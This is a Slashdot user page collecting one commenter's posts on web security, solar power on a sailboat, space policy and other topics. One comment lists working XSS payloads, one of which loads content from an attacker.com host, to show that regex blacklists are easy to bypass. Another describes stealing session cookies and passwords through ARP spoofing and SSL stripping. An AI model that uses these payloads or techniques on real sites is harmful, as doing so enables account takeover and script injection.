×

Announcing: Slashdot Deals - Explore geek apps, games, gadgets and more. (what is this?)

Thank you!

We are sorry to see you leave - Beta is different and we value the time you took to try it out. Before you decide to go, please take a look at some value-adds for Beta and learn more about it. Thank you for reading Slashdot, and for making the site better!

Comments

top

Google Chrome Will Block All NPAPI Plugins By Default In January

cbhacking Re:Dropping NPAPI broke VMware consoles on Linux (107 comments)

Stupid and kludgey hack, but is it possible to solve this, at least to a degree, with Wine? Running either the Windows version of Flashplayer (in something like nspluginwrapper; I think I remember hearing about a way to do this though I never tried it) in a Linux browser, or running a full Windows browser (can Wine do that these days?) seems like it solves the problem. It introduces at least one problem, too, of course... but at least you *can* install updates instead of pinning to a version that will only get more outdated...

2 days ago
top

Rooftop Solar Could Reach Price Parity In the US By 2016

cbhacking Re:cost/price per kW hour comparison is nonsense (516 comments)

it's a near impossibility to site a solar panel on a sailboat that is entirely shade free for the entire length of the day

That's probably true of a reasonably-sized monohull, but Ocelot is a cat. Setup is 4x 120W Kyocera panels out over the dinghy davits (we have a lot of room back there and it doubles as a shade for the rear of the cockpit). You can read a bit more about them here (photos are outdated in general but we haven't modified the array since they were taken): http://svocelot.com/Ocelot/mod...

Having the panels so far aft and so high provided some protection from salt spray (enough that they don't need cleaning after any but the roughest passages, the kind where the whole boat needs a good rain rinse) and also kept them out of the line of most of our shadows. If the sun sets or rises directly in line with the panels and mast, then yes, we'll lose that panel, but this can often be remedied by running the boom out to one side (tied down with the jibe preventer) and letting the (relatively huge) sail protector swing the boat a few degrees away from pointing dead into the wind. By anywhere close to the hours when the sun is at full power, even our slightly-raked mast just isn't far enough back to shade the panels. (As a side note, it occurs to me that this may explain why the ramp up to full power took longer in the morning than evening; if the easterly winds meant the panels were occasionally shaded in the early morning, we'd only have 3/4 the nominal power production for that much insolation.)

As for angle, that definitely cost us some power - our panels are very much immobile, aside from changing the orientation of the entire boat - but I'm not actually sure how much. Even at 60 degrees off apex, which is pretty late in the day (assuming you're right under the sun's path, within +/- 60 degrees is 1/3 of the day, or 8 hours), you still get 50% of the insolation you would get at apex, atmospheric losses aside. That's certainly significant losses, and it drops off sharply after that, but the middle hours of the day are not severely affected.

By the way, nice site! I'll have to ask my folks if they ever ran into Animation coming up the Aus coast. Alternatively, do you know S/V Vamp? Good friends of ours. I'm sorry you posted as AC but I may ping you by email.

2 days ago
top

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re:Regular expressions (40 comments)

<img src="xss" onerror="alert('Nope!')" />
<iframe src="javascript:alert('That won't work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

5 days ago
top

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re: Regular expressions (40 comments)

Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There's many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

5 days ago
top

Russia May Be Planning National Space Station To Replace ISS

cbhacking Re:So it was a documentary (235 comments)

Source? Given the extreme cost of any wasted launch mass, I can't imagine they would operate every launch armed. That they have experimented with arming the capsules would be no surprise - I'd be shocked if they hadn't experimented with arming *some* of their spacecraft, even if only unmanned satellites - and they might even have launched armed craft, but I sincerely doubt they've done so on *every* launch.

about a week ago
top

Russia May Be Planning National Space Station To Replace ISS

cbhacking Re: Forget the Space Station (235 comments)

Not sure if serious, so I'll respond as if you are: nuclear waste does not "explode". The reason it's "waste" is because it no longer is even capable of maintaining a barely critical chain reaction in a moderated reactor core (neutron moderation - slowing them down to the point that they can be captured by other nuclei - is an important part of reactor operation). By itself, it's hot (decay heat) and radioactive (most of the half-lives are really long, so it doesn't actually release a ton of radiation per unit time but it will keep doing it for a long time), but that's about it. Now, it could be reprocessed to remove the low-grade stuff and refine out the actually really useful material. Only about 3% of the potential energy gets extracted from fuel in modern reactors before it drops to the point of being unable to maintain criticality, but with enough work you can purify it and make it usable again. You could, in fact, purify it even more to the point where it will go supercritical *without* a reactor core's moderation - this is one way to make bomb-grade material - but that's difficult, expensive, and never going to happen naturally.

about a week ago
top

Russia May Be Planning National Space Station To Replace ISS

cbhacking Re:What's it good for? (235 comments)

Oh, that's hardly true. As a random example, SpaceX's Merlin rockets (currently on their 4th revision, not counting the difference between atmospheric and vacuum variants) have the highest thrust-to-weight ratio of any production rocket engine, and they are a very recent design. The Space Shuttle Main Engines have a significantly higher specific impulse (thust*time per mass of fuel) but the fuel (hydrogen) is so low-density that you need a ton of it to get anywhere, and volume has its own costs (especially in atmosphere). The SSMEs also went through a number of revisions that increased their power and efficiency.

On the other hand, just because SpaceX is busy pushing the bounds of chemical rockets does not, by any means, mean we shouldn't be researching alternate thrust systems... and we are! Not as enthusiastically as I'd like to see, but it's happening. There's research into high-efficiency space drives, alternate launch systems, and even some research into drives which have the capability to make interstellar flight potentially feasible. None of these are close to production, and some of them (especially the ones involving nuclear-powered drives) have been mothballed for years or decades, but even if the test apparatus (for those projects which got so far) no longer exist, the designs and theories and mathematics do, and rocket scientists can and do continue building on those. I'd really like to see practical research start up again on these: http://en.wikipedia.org/wiki/N..., such as this project (which was building and testing actual hardware!) from the 70s: http://en.wikipedia.org/wiki/N...

about a week ago
top

As Amazon Grows In Seattle, Pay Equity For Women Declines

cbhacking Re:Bullshit Stats. (495 comments)

Do you have any basis for this "hard time believing" or are you just going to ignore evidence in favor of your prejudices?

Don't get me wrong, I was *surprised* by the finding; I live in Seattle, and there are a large population of minorities (blacks, Native Americans, and Hispanics are still very rare in tech, but Indians and various Chinese/Korean/I-can't-tell-by-looking Asian ethnicities are common and I would have guessed they are becoming more common). On the other hand, the rents *are* going up - significantly faster than inflation, in most parts of the city - and that will tend to drive the not-in-tech ethnicities out because they can't command salaries commensurate with the rising cost of living. Seattle has plenty of suburbs (though our relatively awful public transit system means commuting from the suburbs is either very slow or requires a car) and it's not at all inconceivable that the city itself is getting whiter.

Speaking as a cis het white male from a family of above-median income, *you* appear to be (at a minimum) overreacting to the whole "white male guilt" meme, accusing people of "throwing race into the mix" and "stok[ing]" guilt even when citing simple facts. I guess if those facts don't agree with your prejudices then they must be the work of people out to make you feel guilty? Sucks to be you, I guess...

Also, of all the things to critique this study for, you chose them reporting the racial shift? There are far more valid critiques available.

about a week ago
top

As Amazon Grows In Seattle, Pay Equity For Women Declines

cbhacking Re:Here we go again (495 comments)

Citation on the "legalized drugs" causing a problem? It's not like weed was hard to get before, you just had to buy it from criminals and were a criminal yourself for doing so. Now that this is no longer true, people have less, not more, incentive to commit crimes.

Outlawed firearms: you don't live anywhere near WA, do you? The state rate of concealed carry is quite high, especially for a "blue" state. People raise a fuss about it sometimes, but overall there's still a good number of guns around.

about a week ago
top

Jolla Crowdfunds Its First Tablet

cbhacking Re:Battery capacity (56 comments)

This makes me wonder how well battery-optimized Sailfish is (and its apps are). I never owned an N900 or N9, or used one for long enough to get a really good feel for the battery life, but even when new, the N800 could not last even the waking hours of a day. That's assuming I used it similar to how I use the smartphone I got a couple years later (which would last well into a second day, and which - unlike the N800 - has a cellular radio chip).

Anyhow, my point is that most Maemo (N800 OS) apps were really poorly optimized for battery life - not surprisingly, all things considered - and the multitasking model of the OS just compounded the problem unless you were obsessive about closing stuff that you didn't need to have in the background. So, when I hear that a new tablet based on a descendant of Maemo has 2/3 the battery capacity of its competitors, I get concerned. There are mobile OSes that could probably get by with capacity like that, but Maemo was emphatically not one of them. On the other hand, six years is a long time; maybe they've fixed all that now and Sailfish *is* one of the more efficient OSes. If it has true, "desktop-style" multitasking, though, I doubt it.

about a week ago
top

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:The TripAdvisor URL (306 comments)

Thanks! Already commented or would mod you up.

Somehow, the place is ranked 858th of 894. Considering that their reviews (going back months) are mostly terrible - it's not just the recent wave of them, and the photos are damning - plus the recent wave of awful reviews in the wake of this news breaking, I have to wonder how there are 36 hotels that are ranked even *worse*...

about a week ago
top

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:Ask the credit card for a refund (306 comments)

Yep. One of the few times I issued a chargeback (HP laptop repair by manufacturer due to a non-functional video card; the service request explicitly did not include the hard drive but they took it out, (supposedly) destroyed it, and replaced it with an OEM imaged one; fortunately it was a dual-drive laptop and all my data was on the second drive which I'd removed prior to sending it in) the vendor (HP) tried to contest it. After an annoying phone call with my CC company (Visa through Wells Fargo, which I do not recommend) I faxed them the repair order (clearly stating not to touch the HDD), repair receipt (which clearly stated what they'd done to the HDD), and a printout of the IM transcript where their service agent had assured me they wouldn't touch the hard drive. Not *quite* the only time I've had to send a fax in the last ten years, but close.

Anyhow, got the charge for the service reversed, but I did have to prove they had failed to uphold their service agreement to the terms that I'd paid for.

Incidentally, this was after going through numerous complaints with the service center itself (where they used the laughable argument of an analogy to car repair. I had recently had a significant amount of car repair, which by law includes a very detailed statement of what things are and are not to be replaced, itemized costs, and a stipulation that all replaced parts must be available for return to the owner (i.e. no destroying them without the owner explicitly asking you to). I also filed a report with the BBB. This is all from back in 2008 though, and the laptop actually still works so I have no other significant complaint about HP.

about a week ago
top

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:Could be solved be VISA, etc. immediately (306 comments)

Ah, I didn't realize. I assume they're still used for major transactions like buying a car or something?

I live in the USA, but aside from rent and occasionally paying a friend for something expensive I haven't used a check since graduation except to pay rent and buy my car.

about a week ago
top

Rooftop Solar Could Reach Price Parity In the US By 2016

cbhacking Re:cost/price per kW hour comparison is nonsense (516 comments)

Speaking as somebody who has spent year living on a sailboat where electricity was entirely provided by solar:

Even within a few miles of the equator, at local noon, a good rain squall will drop PV production to under 20% of its normal amount at that time. Later (or earlier) in the day it can easily drop all the way to effective zero - the charge controller eats a bit - until the sky clears. Of course, on the tropical ocean, "until the sky clears" is usually not that long. We (well, "they" now; my parents still live aboard but I do not) can run for a couple days (if fully charged) just living off the battery bank, though that would drop its charge lower than we like to let it go. On a really rainy day we might only get about 1/4 the normal production; if that keeps up for three days or so we'll run the engine for an hour to juice the batteries up.

As for winter, the biggest problem is not the angle of the sun (that is *a* problem, even if you tilt the panels, because of atmospheric losses... but it's not a huge problem) but instead is the length of the day. You might get 80% of summer noon on a sunny winter noon in some places (I doubt it would be true up here in the Pacific Northwet, and no, that's not a typo), but the boat has never been anywhere that *has* a "winter" so I can't speak from experience. However, on an average tropical Caribbean day, I measured meaningful power from 7:30 AM to 5:30 PM (10 hours total), with peak output around 1PM. That's only ten hours of electricity generation, and the vast majority of it occurred between 9:30 AM and 4 PM, for a period of only 6.5 hours (call it 2/3 of the day) where the panels produced more than 50% of their typical mid-day maximum. In Seattle in the middle of winter, we don't even get close to 10 hours of daylight; I wouldn't be surprised if we didn't get more than 6.5 hours of usable light at all. So, 2/3 as much time, multiply by 4/5 for lost brightness even at midday, and you're looking at barely over half the power per day in winter that you get from peak summer brightness. Take into account the fact that tropical days are shorter than summer days, and it looks even worse for a comparison of winter vs. summer.

about a week ago
top

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:Could be solved be VISA, etc. immediately (306 comments)

Checks (cheques, this being a British hotel) do still exist, but yeah, that would still be pretty much a death knell. The only time I don't pay for a hotel online (with my credit card) is if I'm in a place so remote I either don't get cell signal or they aren't listed on the online booking sites. Even in most of those places, though, I pay with my card. The only time in the last decade I've paid cash for lodging was a few "tea houses" in the Himalayas, most of which didn't even have electricity (maybe one solar panel, battery, and a light over the kitchen/dining area).

about a week ago
top

Launching 2015: a New Certificate Authority To Encrypt the Entire Web

cbhacking Re:Why do this (free, easy SSL certificates)? (210 comments)

A) WTF do you mean, "nearly worthless"? It'll mean what it does today: the connection is secured using SSL/TLS. Nothing more and nothing less. HTTPS isn't some special indication that a site is Serious Business or something. It just means that an eavesdropper can't listen in on the connection or intercept the traffic. If you *REALLY* think there's value in that distinction, though, Extended Validation certs (green URL bar) will still exist to take money from people like you.
B) Vaguely possible, but not something I'm really worried about. If their server is so insecure that the data they send is easily exposed, then they probably wouldn't have cared about what data they were or were not sending in the first place. Besides, that's *still* better than having *all* the data (including authentication data) be sent in plain text!
C) Bullshit. There are many ways around that. The easy (obvious, to anybody who knows anything about the subject) one is to fake up your own CA, install its certificate, and use a proxy server that serves up faked certs signed by your faked up CA. Burp Suite and Fiddler (two common web proxy tools, the first of which is explicitly intended for web security testing) already support doing this and have supported it for years.

i) How do you think it'll do that? The technique these people are using to authenticate domain ownership is better than what some existing "trusted" CAs use...
ii) Cry me a fucking river. The world will not miss them.
iii) See previous points, including the ones that express "WTF are you talking about?".

Authority: I've been in the information security and penetration testing profession, including lots of tests of web apps, web services, and mobile apps, since 2006.

about a week ago
top

Launching 2015: a New Certificate Authority To Encrypt the Entire Web

cbhacking Re:So how much power will this use? (210 comments)

Actually, there's a pretty damn good reason why Slashdot *should* be private:

You (and I) are logged into this site. That means a unique identifier tied to our Slashdot accounts is sent to the server (in a cookie) with every request we make. This lets Slashdot know who we are, primarily for when we post a comment. The problem is, this unique identifier is sent in plain text; anybody on the same network as you or anywhere in the network between you and Slashdot's servers can see it.

Now, I don't know about you, but it's not *that* hard to get from my Slashdot identity to my real name. I assume everything I post here can be traced back to me. I'm OK with that; if I wanted to post something privately (and for some reason didn't want to post AC) I'd create and use a throwaway account, possibly via TOR + an additional proxy redirect at an Internet café or something (Slashdot blocks known TOR exit nodes, if I recall correctly). However, just because I'm OK with the posts I make being traceable to me does *not* mean I'm OK with just anybody who wants to posting in my name.

Right now, if you and I were on the same local network (wireless or wired), I could use techniques such as ARP spoofing or DNS poisoning to intercept every HTTP request you send to Slashdot, an every response it sends you. I could extract your authentication cookie and use it to make requests that Slashdot would think come from you and would post under your username. I could even have an excellent chance to steal your password; all I would have to do is modify Slashdot's responses to make it look like you aren't signed in. Then, when you go to the login page (which normally sends your password via HTTPS, but is itself served over HTTP), I use a technique called SSL Stripping to modify the login form so that it submits your password over plain-text HTTP (I could then submit that password to Slashdot over HTTPS, as it expects). Now I have your username and password, I can modify your account, I can post as you, and odds are you don't even know you were compromised.

None of that even requires any special skill, not even basic coding. The tools to do it all are pre-built and available for free download.

about a week ago
top

Ubisoft Points Finger At AMD For Assassin's Creed Unity Poor Performance

cbhacking Re:If at first you don't succeed... (262 comments)

Well, or you could STOP BUYING DRM SHIT instead, too. If Steam can take away your game library (and they can, and sometimes will) then they're DRM and they're shit, plain and simple. I do not get all this fawning over Steam that I see from so many people in what's normally a very anti-DRM community.

about two weeks ago
top

Ubisoft Points Finger At AMD For Assassin's Creed Unity Poor Performance

cbhacking Re:If at first you don't succeed... (262 comments)

This is why I don't drop a lot of money on a game unless I've been able to trial it. Not pirate it, just trial it. There are, in fact, game devs that release trials of their games.

Most single-player RPGs and adventure games do not, which is kind of odd because it should be pretty easy to figure out a point (in either time or game progression) where if the player is enjoying the game they'll be hooked but which still leaves lots of content. Conversely, damn near all MMOs do offer such a trial, typically with a level cap and/or time cap. While I'm well aware of the differences between MMOs and single-player games, I don't understand why the big devs are so aware of the "get them hooked and they'll pay up" system for MMOs but don't take the obvious adaptation for single-player games.

Well, unless they know their games are shit and don't want people to know that before they buy. But that still doesn't justify pirating the game, just watch other people play (friends or reviewers), or borrow from a friend if possible.

about two weeks ago
top

Popular Smartphones Hacked At Mobile Pwn2Own 2014

cbhacking Re:Apple (52 comments)

No, PC browsers (with the possible exception of Safari?) don't do anything nearly so braindead, nor do any of the other kinds of PC software that use a JIT (a few examples: Java, .NET, Flash). You allocate the memory, with pages mapped R/W. You emit JIT-compiled code into a page. You re-map the page to R/X! Repeat as more pages are needed. You never, even have a R/W/X page.

In fact, browsers (IE and Chrome at a minimum, probably others) and Flashplayer take things a step further. Since you can generate a huge number of almost-entirely-attacker-controlled instructions by doing operation that will compile down as arithmetic on immediate values (constants), and since x86 (and, to a lesser extent, many ARM systems courtesy of THUMB-2 mode) allows code to be interpreted as a completely different instruction sequence if you enter the binary stream in the middle of an instruction, one technique for getting executable-mapped shellcode into a browser is to have a script that does a ton of arithmetic on carefully chosen constants. Therefore, the above-mentioned JITs (IE, Chrome, Flashplayer, maybe others) use a technique called "constant blinding" where every constant operation is actually emitted as two instructions: a masked constant getting XORed with its mask value to produce the expected constant (in a register), and then an operation on that value. No long sequence of known instructions with attacker-controlled immediates means no way to predict the result of entering an instruction stream at an offset.

If Safari on iOS really is so stupid as to have R/W/X pages just because of its JIT, Apple has fucked up colossally.

about two weeks ago

Submissions

top

Microsoft allowing WP8 users to get updates directly

cbhacking cbhacking writes  |  about a year ago

cbhacking (979169) writes "In June of 2012, Microsoft announced that they would be providing a system whereby "registered [Windows Phone] enthusiasts get early access to updates" without waiting for carrier approval and broad distribution. For more than a year, that has been an unfulfilled promise, and for many users, updates have been delayed or may even still be unavailable. Today, coinciding with the release of WP8 Update 3 (a.k.a. GDR3), Microsoft is allowing "developers" (anybody who has enabled app sideloading on their phone) to opt into a "Windows Phone Preview" program to allow updating immediately.

Like the update itself, this is likely a move in response to consumer demand and comparisons to iOS and Android, as there is little in the update which specifically interests developers. However, the program does warn that participation may invalidate your device's warranty; this may have been required by the carriers to relieve concerns of high support costs in the event of a botched update. While only the Microsoft portion of the updates (as opposed to driver firmware or OEM customizations) are available through this program, participating phones will also continue to receive public updates as they are rolled out."
top

Zune 3.0: Wireless Purchase, Games, 16GB

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "Microsoft released the Zune 3.0 yesterday. The device firmware has been immensely upgraded: it now supports connecting to wireless access points, sampling and purchasing music through a built-in store interface, playing games, and several other new things. You can read Microsoft's blurb on what's new at zune.net.

The Windows software has also been improved, etter integrating the social features.

Additionally, zunes are now available in more colors, the 4GB flash player is being discontinued for a 16GB player, and there's now a HDD-based 120GB model."

Link to Original Source
top

CrossOver Games released for Linux, OS X

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "CodeWeavers, the company that supports the open-source Wine project that allows running Windows applications on UNIX-like operating systems, has released CrossOver Games for Linux and OS X. The launch includes a considerable list of supported titles, including such popular (and graphically intensive) games as EVE Online, Counterstrike: Source (and other Steam games), and World of WarCraft.

A trial version is also available for download."

Link to Original Source
top

Microsoft .NET source to be available for viewing

cbhacking cbhacking writes  |  about 7 years ago

cbhacking writes "A post on the blog of Microsoft's Scott Guthrie has some exciting news for .NET developers: with the release of Visual Studio 2008 later this year, the .NET Framework 3.5 source code will be released for reference purposes. Most of the libraries, including System.Runtime, System.Security, System.Windows.Forms, and System.Web will be made available with the release of VS2008, with more some additional non-core libraries coming later. The code will be available for either standalone download and viewing, or as debugging symbols with associated source for integrated debugging with VS2008.

There's a catch though: although the license abbreviation used in the post, MS-RL, usually refers to the copyleft and OSI-approved Microsoft Reciprocal License (which allows modification and redistribution), the license actually explicitly mentioned and linked to is the Microsoft Reference License, which prohibits modification or redistribution. Although an open-source release of the code would be great, this is still likely to be very helpful for debugging, examining behavior of the libraries, and selecting the correct methods or algorithms for a given situation."
top

Iraq Whistleblower Imprisoned, Tortured

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Forbes.com has a telling story on the fraud and corruption that has plagues the Iraqi reconstruction efforts and, more frighteningly, the harsh penalties faced by whistleblowers. Many have been vilified, demoted, or fired outright. Now, the story has come out of Navy veteran Donald Vance, who was working as a civilian in an Iraqi company. After reporting to the FBI that his company was making illegal sales of military weapons to customers ranging from State Department workers to Iraqi insurgents, Vance was held without a trial for 97 days in Camp Cropper, an American military prison outside Baghdad. During his time there, he was subjected to "that head-banging music blaring dawn to dusk and interrogators yelling the same questions over and over."

Vance is now back in the USA and, along with a colleague who helped him gather evidence and was treated similarly in return, has filed a federal lawsuit alleging they were illegally imprisoned and subjected to physical and mental interrogation tactics "reserved for terrorists and so-called enemy combatants.""

Link to Original Source
top

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Previously, searching for 'Powertoy Vista' has been a quick road to failure. However, Brandon Paddock, a MS developer, has independently produced and is maintaining a very handy tool called Search++ that adds all kinds of capabilities to the built in desktop search.
Some of the standard features are things like typing 'g <search string>' to launch a Google search, or 'play[artist|album] <name>' to find and start playing music. Another, very nice for those of us who start almost all programs in Vista from the Start menu, is the ability to start programs with elevated permissions via 'sudo <Program>'.
The basic features are great and very easy to use, but Start++ is also extensible and user-modifiable. You can even import additional search tools (called 'Startlets'), and export your own Startlets.
You can download Search++ and additional Startlets here."
top

cbhacking cbhacking writes  |  about 8 years ago

cbhacking writes "ABC News has a well-written review of the latest version of the Microsoft Office suite, which has been shipped to manufacturers. Representing the first major upgrade since 2003, Office 2007 has an incredible and instantly visible collection of new features, including an innovative new interface. For those who downloaded the public beta (all ~5 million of us), Office 2007 has already shown itself to be an amazing software suite.

The review includes overall impressions of the new version, plus ratings of the most common individual apps. It is mostly positive, from the easy learning curve for the new interface and the capabilities it offers, to the number of things Microsoft finally got RIGHT, to the good migration tools.

In addition to the many tools and tips the review mentions, I would add the ability of Word to (via plugins) read/write ODF and to export to PDF and Microsoft's new XPS format."
top

cbhacking cbhacking writes  |  about 8 years ago

cbhacking writes "The Pentagon is currently considering options for developing "the ability to strike targets around the world within an hour." According to Space.com, there are several main options being considered: an "Advanced Hypersonic Weapon", placing weapon payloads on small space launch vehicles, fitting missile submarines with a new design of ballistic missile with a conventional payload, or placing conventional warheads on the (traditionally nuclear) Trident missiles our subs currently carry.

Aside from the coolness factor of an autonomous hypersonic vehicle which achieves suborbital altitudes but for the most part flies towards its target like an aircraft, the main advantage of the Advanced Hypersonic Weapon seems to be that it wouldn't be confused with a nuclear launch. Several prominent people, including Ted "Series of Tubes" Stevens, have suggested that using Trident missiles would be dangerous as it may cause other countries to believe we are launching nuclear warheads at them. However, it appears to be the option involving the least re-invention of the wheel, and could be operational "before the end of this decade."

The option of weaponizing space launch vehicles seems to already be facing significant opposition. The Advanced Hypersonic Weapon is receiving some funding, but re-arming the Tridents is out at least until completion of a report on — among other things — the military and political issues.

Is it just me, or aren't there any major reasons the other weapons couldn't be equipped with nuclear warheads anyhow? Do we actually need a different weapon for everything?"
top

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "The Windows Vista Team has posted a blog about the "Express Upgrade" program. Basically, if you buy a new computer with XP, Microsoft will make the upgrade to Vista available for a relatively low price.

The edition(s) you can upgrade to through this offer vary by what edition of XP you have. For example, Media Center will upgrade to Vista Home Premium, and Professional or Tablet to Vista Business, for a nominal cost. XP Home can be upgraded to either Vista Home Basic or Premium, for a 50% discount off the normal upgrade pricing. Enterprise and Ultimate are not offered in this list. Note that the upgrade versions of Vista will already cost less than the full retail versions; this program reduces the cost further for people who purchase a PC just before Vista comes out (or shortly thereafter).

It seems that very few people actually upgrade the OS; they simply buy a new computer with the new version. Maybe this program will increase the Vista install base in its first few months?"

Journals

top

Another major music store offers unrestricted MP3s

cbhacking cbhacking writes  |  more than 7 years ago

When I started the RealNetworks Rhapsody software this morning, I discovered a cause for some celebration by anybody who supports DRM-free music purchases: the Rhapsody store is now offering some unrestricted MP3 downloads. At present only about 5000 albums (roughly 50000 songs) are available, but that is just an initial offer - I haven't even found an announcement anywhere - and they claim to be working to increase the number of MP3 tracks available.

The MP3s are encoded at 256kbps, and cost no more than the standard DRM-crippled music (which is also 256kbps) at 89c/song for subscribing members, or 99c/song for non-subscribers (the subscription gives the ability to listen to streamed music on demand, starting at $13/month). Prices are US dollars, and I don't know whether the service is available internationally.

The bad news: downloading the music requires running the Rhapsody player software (version 4, just released) and at present it's only available on Windows. Online streaming is available to other OSes through http://rhapsody.com/ (works in Firefox, via a plugin) but the cross-platform Real Player software cannot access the music store, and last I tried it wouldn't run in wine.

Slashdot Login

Need an Account?

Forgot your password?